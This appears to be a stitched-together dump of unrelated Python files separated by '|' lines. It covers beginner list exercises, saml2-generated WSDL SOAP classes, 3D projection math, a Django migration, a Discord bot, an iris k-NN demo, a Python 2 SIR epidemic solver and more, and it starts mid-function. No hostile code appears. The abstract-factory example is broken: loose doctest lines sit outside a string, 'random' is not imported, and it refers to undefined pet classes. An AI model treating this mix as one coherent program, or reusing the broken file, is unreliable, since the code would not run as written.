return(j)
print(first_p_length([30,22,4,52,3]))
# This Length, That Value - Write a function that accepts two integers as parameters:
# size and value. The function should create and return a list whose length is equal to the given size,
# and whose values are all the given value.
# Example: length_and_value(4,7) should return [7,7,7,7]
# Example: length_and_value(6,2) should return [2,2,2,2,2,2]
def size_and_value(size,value):
new_list = []
for i in range(size):
new_list.append(value)
return (new_list)
print(size_and_value(6,4))
|
"""
abstraction of a lane line
"""
class LaneLine(object):
def __init__(self):
self.fit = None
self.x = None
self.yvals = None
self.curverad = None
def reset(self):
# if self.x is not None and len(self.x) > 0:
# del self.x[:]
# if self.yvals is not None and len(self.yvals) > 0:
# del self.yvals[:]
self.x = []
self.yvals = []
self.fit = None
self.curverad = None
|
import numpy as np
class Transformer:
def transform_X(self, X):
return X
def transform_y(self, y):
return y
def format_X(self, X):
num_samples = len(X)
num_features = len(X[0])
return np.reshape(X, [num_samples, num_features])
def format_y(self, y):
print('y', y)
num_samples = len(y)
num_targets = len(y[0])
return np.reshape(y, [num_samples, num_targets])
|
# -*- coding: utf-8 -*-
"""
@author: Chris Lucas
"""
import os
from flask import json
from app import app, api
OUTPUT = 'static/swagger.json'
mode = os.environ['SESLR_APP_MODE']
mode = '/' + mode if mode != 'prod' else ''
base_path = '{}/api/'.format(mode)
os.makedirs(os.path.dirname(OUTPUT), exist_ok=True)
with app.test_request_context():
swagger = api.__schema__
swagger['basePath'] = base_path
with open(OUTPUT, 'w') as f:
f.write(json.dumps(
swagger,
sort_keys=True,
indent=4,
separators=(',', ': ')
))
|
#!/usr/bin/env python
#
# Generated Fri May 27 17:23:42 2011 by parse_xsd.py version 0.4.
#
import saml2
from saml2 import SamlBase
from saml2.schema import wsdl
NAMESPACE = "http://schemas.xmlsoap.org/wsdl/soap/"
class EncodingStyle_(SamlBase):
"""The http://schemas.xmlsoap.org/wsdl/soap/:encodingStyle element"""
c_tag = "encodingStyle"
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def encoding_style__from_string(xml_string):
return saml2.create_class_from_xml_string(EncodingStyle_, xml_string)
class TStyleChoice_(SamlBase):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tStyleChoice element"""
c_tag = "tStyleChoice"
c_namespace = NAMESPACE
c_value_type = {"base": "xs:string", "enumeration": ["rpc", "document"]}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def t_style_choice__from_string(xml_string):
return saml2.create_class_from_xml_string(TStyleChoice_, xml_string)
class TOperation_(wsdl.TExtensibilityElement_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tOperation element"""
c_tag = "tOperation"
c_namespace = NAMESPACE
c_children = wsdl.TExtensibilityElement_.c_children.copy()
c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
c_attributes["soapAction"] = ("soap_action", "anyURI", False)
c_attributes["style"] = ("style", TStyleChoice_, False)
def __init__(
self,
soap_action=None,
style=None,
required=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
wsdl.TExtensibilityElement_.__init__(
self,
required=required,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.soap_action = soap_action
self.style = style
def t_operation__from_string(xml_string):
return saml2.create_class_from_xml_string(TOperation_, xml_string)
class UseChoice_(SamlBase):
"""The http://schemas.xmlsoap.org/wsdl/soap/:useChoice element"""
c_tag = "useChoice"
c_namespace = NAMESPACE
c_value_type = {"base": "xs:string", "enumeration": ["literal", "encoded"]}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def use_choice__from_string(xml_string):
return saml2.create_class_from_xml_string(UseChoice_, xml_string)
class TFaultRes_(SamlBase):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tFaultRes element"""
c_tag = "tFaultRes"
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes["{http://schemas.xmlsoap.org/wsdl/}required"] = ("required", "None", False)
c_attributes["parts"] = ("parts", "NMTOKENS", False)
c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
c_attributes["use"] = ("use", UseChoice_, False)
c_attributes["namespace"] = ("namespace", "anyURI", False)
def __init__(
self,
required=None,
parts=None,
encoding_style=None,
use=None,
namespace=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(
self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.required = required
self.parts = parts
self.encoding_style = encoding_style
self.use = use
self.namespace = namespace
class TFault_(TFaultRes_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tFault element"""
c_tag = "tFault"
c_namespace = NAMESPACE
c_children = TFaultRes_.c_children.copy()
c_attributes = TFaultRes_.c_attributes.copy()
c_child_order = TFaultRes_.c_child_order[:]
c_cardinality = TFaultRes_.c_cardinality.copy()
c_attributes["name"] = ("name", "NCName", True)
def __init__(
self,
name=None,
required=None,
parts=None,
encoding_style=None,
use=None,
namespace=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
TFaultRes_.__init__(
self,
required=required,
parts=parts,
encoding_style=encoding_style,
use=use,
namespace=namespace,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.name = name
def t_fault__from_string(xml_string):
return saml2.create_class_from_xml_string(TFault_, xml_string)
class THeaderFault_(SamlBase):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tHeaderFault element"""
c_tag = "tHeaderFault"
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes["message"] = ("message", "QName", True)
c_attributes["part"] = ("part", "NMTOKEN", True)
c_attributes["use"] = ("use", UseChoice_, True)
c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
c_attributes["namespace"] = ("namespace", "anyURI", False)
def __init__(
self,
message=None,
part=None,
use=None,
encoding_style=None,
namespace=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(
self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.message = message
self.part = part
self.use = use
self.encoding_style = encoding_style
self.namespace = namespace
def t_header_fault__from_string(xml_string):
return saml2.create_class_from_xml_string(THeaderFault_, xml_string)
class TAddress_(wsdl.TExtensibilityElement_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tAddress element"""
c_tag = "tAddress"
c_namespace = NAMESPACE
c_children = wsdl.TExtensibilityElement_.c_children.copy()
c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
c_attributes["location"] = ("location", "anyURI", True)
def __init__(
self,
location=None,
required=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
wsdl.TExtensibilityElement_.__init__(
self,
required=required,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.location = location
def t_address__from_string(xml_string):
return saml2.create_class_from_xml_string(TAddress_, xml_string)
class TBinding_(wsdl.TExtensibilityElement_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tBinding element"""
c_tag = "tBinding"
c_namespace = NAMESPACE
c_children = wsdl.TExtensibilityElement_.c_children.copy()
c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
c_attributes["transport"] = ("transport", "anyURI", True)
c_attributes["style"] = ("style", TStyleChoice_, False)
def __init__(
self,
transport=None,
style=None,
required=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
wsdl.TExtensibilityElement_.__init__(
self,
required=required,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.transport = transport
self.style = style
def t_binding__from_string(xml_string):
return saml2.create_class_from_xml_string(TBinding_, xml_string)
class Operation(TOperation_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:operation element"""
c_tag = "operation"
c_namespace = NAMESPACE
c_children = TOperation_.c_children.copy()
c_attributes = TOperation_.c_attributes.copy()
c_child_order = TOperation_.c_child_order[:]
c_cardinality = TOperation_.c_cardinality.copy()
def operation_from_string(xml_string):
return saml2.create_class_from_xml_string(Operation, xml_string)
class TBody_(wsdl.TExtensibilityElement_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tBody element"""
c_tag = "tBody"
c_namespace = NAMESPACE
c_children = wsdl.TExtensibilityElement_.c_children.copy()
c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
c_attributes["parts"] = ("parts", "NMTOKENS", False)
c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
c_attributes["use"] = ("use", UseChoice_, False)
c_attributes["namespace"] = ("namespace", "anyURI", False)
def __init__(
self,
parts=None,
encoding_style=None,
use=None,
namespace=None,
required=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
wsdl.TExtensibilityElement_.__init__(
self,
required=required,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.parts = parts
self.encoding_style = encoding_style
self.use = use
self.namespace = namespace
def t_body__from_string(xml_string):
return saml2.create_class_from_xml_string(TBody_, xml_string)
class Fault(TFault_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:fault element"""
c_tag = "fault"
c_namespace = NAMESPACE
c_children = TFault_.c_children.copy()
c_attributes = TFault_.c_attributes.copy()
c_child_order = TFault_.c_child_order[:]
c_cardinality = TFault_.c_cardinality.copy()
def fault_from_string(xml_string):
return saml2.create_class_from_xml_string(Fault, xml_string)
class Headerfault(THeaderFault_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:headerfault element"""
c_tag = "headerfault"
c_namespace = NAMESPACE
c_children = THeaderFault_.c_children.copy()
c_attributes = THeaderFault_.c_attributes.copy()
c_child_order = THeaderFault_.c_child_order[:]
c_cardinality = THeaderFault_.c_cardinality.copy()
def headerfault_from_string(xml_string):
return saml2.create_class_from_xml_string(Headerfault, xml_string)
class Address(TAddress_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:address element"""
c_tag = "address"
c_namespace = NAMESPACE
c_children = TAddress_.c_children.copy()
c_attributes = TAddress_.c_attributes.copy()
c_child_order = TAddress_.c_child_order[:]
c_cardinality = TAddress_.c_cardinality.copy()
def address_from_string(xml_string):
return saml2.create_class_from_xml_string(Address, xml_string)
class Binding(TBinding_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:binding element"""
c_tag = "binding"
c_namespace = NAMESPACE
c_children = TBinding_.c_children.copy()
c_attributes = TBinding_.c_attributes.copy()
c_child_order = TBinding_.c_child_order[:]
c_cardinality = TBinding_.c_cardinality.copy()
def binding_from_string(xml_string):
return saml2.create_class_from_xml_string(Binding, xml_string)
class Body(TBody_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:body element"""
c_tag = "body"
c_namespace = NAMESPACE
c_children = TBody_.c_children.copy()
c_attributes = TBody_.c_attributes.copy()
c_child_order = TBody_.c_child_order[:]
c_cardinality = TBody_.c_cardinality.copy()
def body_from_string(xml_string):
return saml2.create_class_from_xml_string(Body, xml_string)
class THeader_(wsdl.TExtensibilityElement_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:tHeader element"""
c_tag = "tHeader"
c_namespace = NAMESPACE
c_children = wsdl.TExtensibilityElement_.c_children.copy()
c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
c_children["{http://schemas.xmlsoap.org/wsdl/soap/}headerfault"] = ("headerfault", [Headerfault])
c_cardinality["headerfault"] = {"min": 0}
c_attributes["message"] = ("message", "QName", True)
c_attributes["part"] = ("part", "NMTOKEN", True)
c_attributes["use"] = ("use", UseChoice_, True)
c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
c_attributes["namespace"] = ("namespace", "anyURI", False)
c_child_order.extend(["headerfault"])
def __init__(
self,
headerfault=None,
message=None,
part=None,
use=None,
encoding_style=None,
namespace=None,
required=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
wsdl.TExtensibilityElement_.__init__(
self,
required=required,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.headerfault = headerfault or []
self.message = message
self.part = part
self.use = use
self.encoding_style = encoding_style
self.namespace = namespace
def t_header__from_string(xml_string):
return saml2.create_class_from_xml_string(THeader_, xml_string)
class Header(THeader_):
"""The http://schemas.xmlsoap.org/wsdl/soap/:header element"""
c_tag = "header"
c_namespace = NAMESPACE
c_children = THeader_.c_children.copy()
c_attributes = THeader_.c_attributes.copy()
c_child_order = THeader_.c_child_order[:]
c_cardinality = THeader_.c_cardinality.copy()
def header_from_string(xml_string):
return saml2.create_class_from_xml_string(Header, xml_string)
AG_tBodyAttributes = [
("encodingStyle", EncodingStyle_, False),
("use", UseChoice_, False),
("namespace", "anyURI", False),
]
AG_tHeaderAttributes = [
("message", "QName", True),
("part", "NMTOKEN", True),
("use", UseChoice_, True),
("encodingStyle", EncodingStyle_, False),
("namespace", "anyURI", False),
]
ELEMENT_FROM_STRING = {
EncodingStyle_.c_tag: encoding_style__from_string,
Binding.c_tag: binding_from_string,
TBinding_.c_tag: t_binding__from_string,
TStyleChoice_.c_tag: t_style_choice__from_string,
Operation.c_tag: operation_from_string,
TOperation_.c_tag: t_operation__from_string,
Body.c_tag: body_from_string,
TBody_.c_tag: t_body__from_string,
UseChoice_.c_tag: use_choice__from_string,
Fault.c_tag: fault_from_string,
TFault_.c_tag: t_fault__from_string,
Header.c_tag: header_from_string,
THeader_.c_tag: t_header__from_string,
Headerfault.c_tag: headerfault_from_string,
THeaderFault_.c_tag: t_header_fault__from_string,
Address.c_tag: address_from_string,
TAddress_.c_tag: t_address__from_string,
}
ELEMENT_BY_TAG = {
"encodingStyle": EncodingStyle_,
"binding": Binding,
"tBinding": TBinding_,
"tStyleChoice": TStyleChoice_,
"operation": Operation,
"tOperation": TOperation_,
"body": Body,
"tBody": TBody_,
"useChoice": UseChoice_,
"fault": Fault,
"tFault": TFault_,
"header": Header,
"tHeader": THeader_,
"headerfault": Headerfault,
"tHeaderFault": THeaderFault_,
"address": Address,
"tAddress": TAddress_,
"tFaultRes": TFaultRes_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
|
import numpy as np
def _unit_vector(data, axis=None, out=None):
""" Return ndarray normalized by length, i.e. Euclidean norm, along axis.
>>> v0 = np.random.random(3)
>>> v1 = _unit_vector(v0)
>>> np.allclose(v1, v0 / np.linalg.norm(v0))
True
>>> v0 = np.random.rand(5, 4, 3)
>>> v1 = _unit_vector(v0, axis=-1)
>>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=2)), 2)
>>> np.allclose(v1, v2)
True
>>> v1 = _unit_vector(v0, axis=1)
>>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=1)), 1)
>>> np.allclose(v1, v2)
True
>>> v1 = np.empty((5, 4, 3))
>>> _unit_vector(v0, axis=1, out=v1)
>>> np.allclose(v1, v2)
True
>>> list(_unit_vector([]))
[]
>>> list(_unit_vector([1]))
[1.0]
"""
if out is None:
data = np.array(data, dtype=np.float64, copy=True)
if data.ndim == 1:
data /= np.sqrt(np.dot(data, data))
return data
else:
if out is not data:
out[:] = np.array(data, copy=False)
data = out
length = np.atleast_1d(np.sum(data * data, axis))
np.sqrt(length, length)
if axis is not None:
length = np.expand_dims(length, axis)
data /= length
if out is None:
return data
def rotation_matrix(th):
"""
:param th: vector of radians for rotation in x, y, z axis respectively
:return: 3x3 rotation matrix
"""
Rx = [[1., 0., 0.],
[0., np.cos(-th[0]), -np.sin(-th[0])],
[0., np.sin(-th[0]), np.cos(-th[0])]]
Ry = [[np.cos(-th[1]), 0., np.sin(-th[1])],
[0., 1., 0.],
[-np.sin(-th[1]), 0., np.cos(-th[1])]]
Rz = [[np.cos(-th[2]), -np.sin(-th[2]), 0.],
[np.sin(-th[2]), np.cos(-th[2]), 0.],
[0., 0., 1.]]
return np.dot(Rx, np.dot(Ry, Rz))
def _projection_matrix(point, normal, direction=None,
perspective=None, pseudo=False):
"""Return matrix to project onto plane defined by point and normal.
Using either perspective point, projection direction, or none of both.
If pseudo is True, perspective projections will preserve relative depth
such that Perspective = dot(Orthogonal, PseudoPerspective).
>>> P = _projection_matrix([0, 0, 0], [1, 0, 0])
>>> np.allclose(P[1:, 1:], np.identity(4)[1:, 1:])
True
>>> point = np.random.random(3) - 0.5
>>> normal = np.random.random(3) - 0.5
>>> direct = np.random.random(3) - 0.5
>>> persp = np.random.random(3) - 0.5
>>> P0 = _projection_matrix(point, normal)
>>> P1 = _projection_matrix(point, normal, direction=direct)
>>> P2 = _projection_matrix(point, normal, perspective=persp)
>>> P3 = _projection_matrix(point, normal, perspective=persp, pseudo=True)
>>> P = _projection_matrix([3, 0, 0], [1, 1, 0], [1, 0, 0])
>>> v0 = (np.random.rand(4, 5) - 0.5) * 20
>>> v0[3] = 1
>>> v1 = np.dot(P, v0)
>>> np.allclose(v1[1], v0[1])
True
>>> np.allclose(v1[0], 3-v1[1])
True
"""
M = np.identity(4)
point = np.array(point[:3], dtype=np.float64, copy=False)
normal = _unit_vector(normal[:3])
if perspective is not None:
# perspective projection
perspective = np.array(perspective[:3], dtype=np.float64,
copy=False)
M[0, 0] = M[1, 1] = M[2, 2] = np.dot(perspective - point, normal)
M[:3, :3] -= np.outer(perspective, normal)
if pseudo:
# preserve relative depth
M[:3, :3] -= np.outer(normal, normal)
M[:3, 3] = np.dot(point, normal) * (perspective + normal)
else:
M[:3, 3] = np.dot(point, normal) * perspective
M[3, :3] = -normal
M[3, 3] = np.dot(perspective, normal)
elif direction is not None:
# parallel projection
direction = np.array(direction[:3], dtype=np.float64, copy=False)
scale = np.dot(direction, normal)
M[:3, :3] -= np.outer(direction, normal) / scale
M[:3, 3] = direction * (np.dot(point, normal) / scale)
else:
# orthogonal projection
M[:3, :3] -= np.outer(normal, normal)
M[:3, 3] = np.dot(point, normal) * normal
return M
def proj_iso_plane(pts, sad, gantry_deg, collimator_deg=90.0):
# pts = pts.copy()
"""
ssd: source to axis distance
gantry_ang: gantry rotation angle
collimator_deg: collimator rotation angle
pts: point or matrix of column vectors
"""
rot = [0.0, np.radians(collimator_deg), np.radians(gantry_deg)]
src = [0, -sad, 0]
pts_r = np.dot(rotation_matrix(rot), pts)
pts_r = np.vstack((pts_r, np.ones(pts_r.shape[1])))
pts_r = np.dot(_projection_matrix([0., 0., 0.], [0., 1., 0.], perspective=src), pts_r)
pts_r = np.divide(pts_r[:3], pts_r[3])
return pts_r
|
MAX_64_INT = 9223372036854775807
MAX_32_INT = 2**32-1
GROUND_FILE_NAME = "ground_truth.txt"
UNIVERSE_FILE_NAME = "universe.txt"
WHITES_FILE_NAME = "whites_example.txt"
|
# Generated by Django 3.1.1 on 2020-09-08 20:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('soldiers_viewer', '0006_auto_20200907_2012'),
]
operations = [
migrations.AddField(
model_name='soldier',
name='address',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='soldier',
name='regiment',
field=models.CharField(max_length=50, null=True),
),
migrations.AlterField(
model_name='soldier',
name='soldier_number',
field=models.CharField(max_length=20, null=True),
),
migrations.AlterField(
model_name='soldier',
name='soldier_rank',
field=models.CharField(max_length=20, null=True),
),
]
|
import discord
import random
import json
from discord.ext import commands
class Commands(commands.Cog):
def __init__(self, client):
self.client = client
self.limited = []
self.count = 0
@commands.command()
async def random(self,ctx):
with open('./model/utils/elements.json', 'r') as jsonFile:
data = json.load(jsonFile)
if len(data) == 0:
await ctx.channel.send("No Images or Videos found!")
return
image = random.choice(data)
while image in self.limited:
self.count += 1
if self.count == 30:
self.limited = []
self.count = 0
image = random.choice(data)
self.limited.append(image)
await ctx.channel.send(image)
#Setup
def setup(client):
client.add_cog(Commands(client))
|
"""
*What is this pattern about?
In Java and other languages, the Abstract Factory Pattern serves to provide an interface for
creating related/dependent objects without need to specify their
actual class.
The idea is to abstract the creation of objects depending on business
logic, platform choice, etc.
In Python, the interface we use is simply a callable, which is "builtin" interface
in Python, and in normal circumstances we can simply use the class itself as
that callable, because classes are first class objects in Python.
*What does this example do?
This particular implementation abstracts the creation of a pet and
does so depending on the factory we chose (Dog or Cat, or random_animal)
This works because both Dog/Cat and random_animal respect a common
interface (callable for creation and .speak()).
Now my application can create pets abstractly and decide later,
based on my own criteria, dogs over cats.
*Where is the pattern used practically?
*References:
https://sourcemaking.com/design_patterns/abstract_factory
http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/
*TL;DR
Provides a way to encapsulate a group of individual factories.
"""
class StatsShop:
"""A Stats shop"""
def __init__(self, stats_factory=None):
"""stat_factory is our abstract factory. We can set it at will."""
self.sport_factory = stats_factory
def show_sport(self):
"""Creates and shows a pet using the abstract factory"""
sport = self.sport_factory()
# print("We have a lovely {}".format(pet))
sport.base_url()
class RotoWire:
def __str__(self):
return "Rotowire"
def get_data(self):
pass
class FantasyPros:
def base_url(self):
return 'www.fantasypros.com/nfl/projections/'
def __str__(self):
return "FantasyPros"
# Additional factories:
# Create a random animal
def random_animal():
"""Let's be dynamic!"""
return random.choice([Dog, Cat])()
# Show pets with various factories
def main():
"""
# A Shop that sells only cats
"""
rotowire_stats = StatsShop(RotoWire)
rotowire_stats.show_sport()
# A shop that sells random animals
>>> shop = PetShop(random_animal)
>>> for i in range(3):
... shop.show_pet()
... print("=" * 20)
We have a lovely Cat
It says meow
====================
We have a lovely Dog
It says woof
====================
We have a lovely Dog
It says woof
====================
"""
if __name__ == "__main__":
random.seed(1234) # for deterministic doctest outputs
import doctest
doctest.testmod()
|
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
import pandas as pd
from sklearn.neighbors import KNeighborsClassifier
import numpy as np
iris_dataset = load_iris()
X_train, X_test, y_train, y_test = train_test_split(iris_dataset['data'], iris_dataset['target'], random_state=0)
knn=KNeighborsClassifier(n_neighbors=1)
knn.fit(X_train,y_train)
X_new =np.array([[5,2.9,1,0.2]])
prediction=knn.predict(X_new)
y_pre=knn.predict(X_test)
def acquaintance_data():
print("Keys of isir_dataset:\n{}".format(iris_dataset.keys()) + "\n\n.........")
print("Target names of isir_dataset:\n{}".format(iris_dataset['target_names']) + "\n\n.........")
print("Feature names of isir_dataset:\n{}".format(iris_dataset['feature_names']) + "\n\n.........")
print("Data of isir_dataset:\n{}".format(iris_dataset['data'][:5]) + "\n\n.........")
print("Target of isir_dataset:\n{}".format(iris_dataset['target'][:5]) + "\n\n.........")
def train_test_data():
print("X_train shape:{}".format(X_train.shape))
print("X_test shape:{}".format(X_test.shape))
print("y_train shape:{}".format(y_train.shape))
print("y_test shape:{}".format(y_test.shape))
def scatter_plot():
iris_dataframe=pd.DataFrame(X_train,columns=iris_dataset['feature_names'])
grr=pd.scatter_matrix(iris_dataframe,c=y_train,figsize=(15,15),marker='o',
hist_kwds={'bins':20},s=60,alpha=0.8
)
def main():
print('\n')
#print(knn.fit(X_train,y_train))
print("Prediction :{}".format(prediction))
print("Prediction target name:{}".format(iris_dataset['target_names'][prediction]))
print("Test set preditions:{}\n".format(y_pre))
print("Test set score:{:.2f}".format(np.mean(y_pre==y_test)))
print("Test set score:{:.2f}".format(knn.score(X_test,y_test)))
main()
|
import glob,os
import numpy as np
import matplotlib.pyplot as plt
from plotmaker import trav_wave
def simple_PDE(T,Nx,Nt,X,lam,beta,S_1,I_1,R_1,f,g,h):
S = np.zeros(Nx+3) #list of Susceptible
#S_1 = np.ones(Nx+1)#list of Susceptible in previous time step
I = np.zeros(Nx+3) #list of Susceptible
#I_1 = np.zeros(Nx+1)#list of Susceptible in previous time step
R = np.zeros(Nx+3) #list of Susceptible
#R_1 = np.zeros(Nx+1)#list of Susceptible in previous time step
print T
print Nt
x = np.linspace(0,X,Nx+1)
t = np.linspace(0,T,Nt+1)
dt = t[1]-t[0]
dx = x[1]-x[0]
print "dt=",dt
print "dx=",dx
print "dx^2=",dx**2
#Check travelling wave
z = np.zeros(Nt+1)
z_S = np.zeros(Nt+1)
z_I = np.zeros(Nt+1)
z_R = np.zeros(Nt+1)
z_X = 15
z_i = int(z_X/dx)
def gauss(t,a,sigma,T):
return a*np.exp(-0.5*(t-T)**2/sigma)
#I_1[:] = gauss(x,0.2,0.5,0) #starts with a gauss function
#I_1[:] += 0.1
np.save("images/Sub%04d" % 0,S_1) #initial conditions
np.save("images/Inf%04d" % 0,I_1) #initial conditions
np.save("images/Rem%04d" % 0,R_1) #initial conditions
#Initial cond for travelling wave
"""
z[0] = z_X
z_S[0] = S_1[z_i]
z_I[0] = I_1[z_i]
z_R[0] = R_1[z_i]
"""
#print "S---------------------"
#print S_1[1:-1]
#def lam():
# return 1
lam = 1
def beta():
return 0 # S_1[1:-1]*I_1[1:-1]/R_1[1:-1]
#print S_1[1:-1]
for n in range(1,Nt+1):
S[1:-1] = S_1[1:-1] + dt*(-S_1[1:-1]*I_1[1:-1]+beta()*R_1[1:-1]+(S_1[2:]-2*S_1[1:-1]+S_1[:-2])/dx**2+f(t[n-1],x))
I[1:-1] = I_1[1:-1] + dt*(S_1[1:-1]*I_1[1:-1]-lam*I_1[1:-1]+(I_1[2:]-2*I_1[1:-1]+I_1[:-2])/dx**2+g(t[n-1],x))
R[1:-1] = R_1[1:-1] + dt*(lam*I_1[1:-1]-beta()*R_1[1:-1]+(R_1[2:]-2*R_1[1:-1]+R_1[:-2])/dx**2+h(t[n-1],x))
"""
z[n] = z_X-n*dt
z_S[n] = S[z_i]
z_I[n] = I[z_i]
z_R[n] = R[z_i]
"""
S[0] = S[2]
S[-1] = S[-3]
I[0] = I[2]
I[-1] = I[-3]
R[0] = R[2]
R[-1] =R[-3]
"""
if (n%40 == 0):
np.save("images/Sub%04d" % (n/40),S)
np.save("images/Inf%04d" % (n/40),I)
np.save("images/Rem%04d" % (n/40),R)
"""
S_1[:] = S
I_1[:] = I
R_1[:] = R
#Find area of Infective
#classnames = ['Susceptible', 'Infective','Removed']
#z_list = [z_S,z_I,z_R]
#trav_wave(Nt,z,z_list,classnames,z_X,'1D')
plotnames = ['images/Sub', 'images/Inf', 'images/Rem']
moviename = 'plots/Travelling_wave'
parameter_values = ['Sub','Inf','Rem']
para_name = "Class"
L = X
return t,x,S[1:-1],I[1:-1],R[1:-1]
def build_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X):
x_list = []
for i in plotnames:
img = "%s%04d.npy" % (i,0)
len_x = len(np.load(img))
x = np.linspace(0,L,len_x)
x_list.append(x)
plotname = "%s*" %(plotnames[0])
Nt = len(glob.glob(plotname))
print Nt
for j in range(Nt):
for i in range(len(plotnames)):
img = "%s%04d.npy" % (plotnames[i],j)
label_name = "%s = %s" % (para_name, parameter_values[i])
plt.plot(x_list[i],np.load(img),label=label_name)
plt.plot([z_X,z_X],[-0.1,1.1],'k')
plt.text(z_X,-0.2,"x")
plt.axis([0,L,-0.1,1.1])
#plt.legend(loc=3)
#plt.legend(bbox_to_anchor=(0.,1.02,1.,.102), loc=3,ncol=3,mode="expand",borderaxespad=0.)
#plt.suptitle(moviename)
nt = (float(T)/Nt)*j
plt.title("time = %1.1f, z=%1.1f" % (nt,(z_X-nt)))
plt.savefig("tmp%04d.png" % j)
if(j%25 == 0 and j < 100):
print j
plt.savefig("plots/trav_wave%04d.png" % (j/25))
plt.close()
os.system('avconv -r 10 -i %s -vcodec libvpx %s.webm' %('tmp%04d.png',moviename))
for filename in glob.glob('tmp*.png'):
os.remove(filename)
def add_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X):
x_list = []
for i in plotnames:
img = "%s%04d.npy" % (i,0)
len_x = len(np.load(img))
x = np.linspace(0,L,len_x)
x_list.append(x)
plotname = "%s*" %(plotnames[0])
Nt = len(glob.glob(plotname))
print Nt
fc = ['green','red']
for j in range(Nt):
for i in range(len(plotnames)):
img = "%s%04d.npy" % (plotnames[i],j)
label_name = "%s = %s" % (para_name, parameter_values[i])
if i == 0:
load_val = np.load(img)
plt.plot(x_list[i],load_val,label=label_name)
plt.fill_between(x_list[i],0,load_val)
else:
load_val += np.load(img)
plt.plot(x_list[i],load_val,label=label_name)
plt.fill_between(x_list[i],load_val-np.load(img),load_val,facecolor=fc[i-1])
plt.axis([0,L,0,1.2])
plt.legend(loc=3)
plt.suptitle(moviename)
plt.title("Spatial spread")
plt.savefig("tmp%04d.png" % j)
plt.close()
os.system('avconv -r 10 -i %s -vcodec libvpx %s.webm' %('tmp%04d.png',moviename))
for filename in glob.glob('tmp*.png'):
os.remove(filename)
#build_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X)
#os.system('rm images/*')
#plt.plot(r,I_1)
#plt.plot(r,S_1)
#plt.show()
|
from jinja2 import Environment, FileSystemLoader
ENV = Environment(loader=FileSystemLoader('.'))
template = ENV.get_template("template.j2")
#class method works to a similar output to the Dictionary method
